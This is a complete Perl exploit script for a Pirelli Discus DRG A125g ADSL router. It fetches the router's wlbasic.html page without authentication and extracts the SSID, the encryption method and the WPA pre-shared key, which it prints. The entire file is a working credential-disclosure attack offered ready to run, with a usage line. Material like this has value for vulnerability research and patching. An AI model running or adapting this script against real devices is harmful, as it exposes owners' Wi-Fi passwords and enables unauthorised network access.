#!/usr/bin/perl
#Author: Sebastián Magof
#Hardware: pirelli discus DRG A125g
#Vulnerable file: wlbasic.html
#Bug: Wifi Password Disclosure
#Type: Local
# (\/)
# (**) ±
#(")(")
#usage:perl exploit.pl
use LWP::UserAgent;
use HTTP::Request;
#begin
print "\n\n************************************************************\n";
print "* Pirelli Discus ADSL DRG A125g Wifi password disclosure *\n";
print "************************************************************\n\n";
#wifi pwd disclosure file
my $url = "http://10.0.0.2/wlbasic.html";
#UserAgent
my $ua = LWP::UserAgent->new();
$ua->agent("Mozilla/5.0");
#Request.
my $req = HTTP::Request->new(GET => $url);
my $request = $ua->request($req);
my $content = $request->content(); #content
my ($ssi) = $content =~ m/ssid = '(.+)'/;
my ($pwd) = $content =~ m/wpaPskKey = '(.+)'/;
my ($enc) = $content =~ m/var wpa = '(.+)'/;
#ssid+encryption method+pwd;
print "Ssid: $ssi\n";
print "Encryption method: $enc\n";
print "Password: $pwd\n\n";
exit(0);
__EOF__n
|